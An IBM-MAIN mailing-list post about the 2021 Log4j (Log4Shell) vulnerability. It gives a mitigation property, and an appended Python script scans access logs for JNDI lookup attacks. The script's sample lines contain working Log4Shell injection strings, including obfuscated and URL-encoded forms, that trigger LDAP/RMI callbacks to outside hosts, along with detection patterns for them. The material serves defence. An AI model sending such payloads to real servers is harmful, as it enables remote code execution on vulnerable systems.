On 12/12/2021 1:20 pm, David Crayford wrote:
Fingers crossed! The truth is almost no mainframe network (worth its
salt) is visible to outside world. But that doesn't stop the public
servers being compromised.
A quick fix if you are unable to update to the patched version is to
use the following Java property:
-Dlog4j2.formatMsgNoLookups=True
It seems slightly unfair to call this a Java vulnerability. It's a
vulnerability in a package written in Java (albeit widely used). If this
is a Java vulnerability, how many C/C++ or even assembler
vulnerabilities have we seen?
*My understanding* is that the vulnerability can be exploited if you log
data that comes from untrusted sources, e.g. user input like URLs, http
headers, perhaps even invalid userids from login attempts?? So I think
it could be potentially exploited on the mainframe if user input is
passed from a front end and logged on the mainframe. The front end
wouldn't need to be written in Java - just the component doing the
logging. Direct network access and visibility to the outside world is
not required. I think outbound access *is* required for the exploit.
Conceptually it seems similar to SQL injection attacks. Among other
things, it highlights the danger of working with data from untrusted
sources including http requests, login attempts, etc.
--
Andrew Rowley
Black Hill Software
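The thread's point is that the dangerous input is whatever gets logged: URLs, HTTP headers, user IDs from login attempts. A practical first check is therefore to look at what is already reaching the loggers. The following is an added example, not code from the thread or from Log4j: it scans web-server access log lines (constructed samples, not real traffic, with addresses from the documentation ranges) for Log4Shell-style `${jndi:...}` lookups in the request line, referer and user-agent fields, unwinds the nested-lookup obfuscations attackers use to hide the literal "jndi" (the `${lower:x}`, `${upper:x}` and `${...:-x}` default-value forms are an assumption about which forms to handle), and pulls out the callback host so the "outbound access is required" observation can be checked against egress rules. The combined log format and the field names are assumptions of this example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache "combined" format (not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2021:13:20:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.8 - - [12/Dec/2021:13:20:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.9 - - [12/Dec/2021:13:20:03 +0000] "GET /?x=%24%7Bjndi%3Armi%3A%2F%2F203.0.113.6%3A1099%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.10 - - [12/Dec/2021:13:20:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:${::-l}dap://203.0.113.7/c}"',
    '198.51.100.11 - - [12/Dec/2021:13:20:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${date:yyyy}"',
]

# Assumed combined-format layout: client, ident, user, [time], "request", status, size, "referer", "agent".
_COMBINED = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Nested lookup forms that resolve to literal characters before the outer lookup runs.
# Assumption: ${lower:x} / ${upper:x} yield x, and ${anything:-x} yields its default x.
_NESTED = re.compile(r"\$\{(?:lower|upper):([^}]*)\}|\$\{[^{}]*:-([^{}]*)\}", re.IGNORECASE)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
_CALLBACK = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)


def normalize(text):
    """Collapse nested lookups to their literal value until nothing changes."""
    prev = None
    while prev != text:
        prev = text
        text = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), text
        )
    return text


def scan_line(line):
    """Return a finding if any logged field carries a JNDI lookup, else None."""
    m = _COMBINED.match(line)
    if not m:
        return None  # only combined-format lines are understood by this example
    for field in ("request", "referer", "agent"):
        raw = m.group(field)
        # URL-decode first (probes in the query string arrive percent-encoded),
        # then resolve the obfuscating inner lookups.
        text = normalize(unquote(raw))
        if _JNDI.search(text):
            cb = _CALLBACK.search(text)
            return {
                "client": m.group("client"),
                "field": field,
                "raw": raw,
                "scheme": cb.group(1).lower() if cb else None,
                "callback": cb.group(2) if cb else None,  # host[:port] to check against egress rules
            }
    return None


def scan(lines):
    """Scan an iterable of access log lines and return all findings."""
    return [f for f in (scan_line(line) for line in lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(f"{finding['client']} {finding['field']}: "
              f"{finding['scheme']} callback to {finding['callback']}")
```

The benign `${date:yyyy}` line is deliberately not flagged: the check is for the JNDI lookup specifically, not for every `${...}` in the input. The callback host is what you would feed to an egress-filter or firewall log search, which is the quickest way to tell a probe that merely got logged from one that actually reached back out.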
----------------------------------------------------------------------
For IBM-MAIN subscribe / signoff / archive access instructions,
send email to [email protected] with the message: INFO IBM-MAIN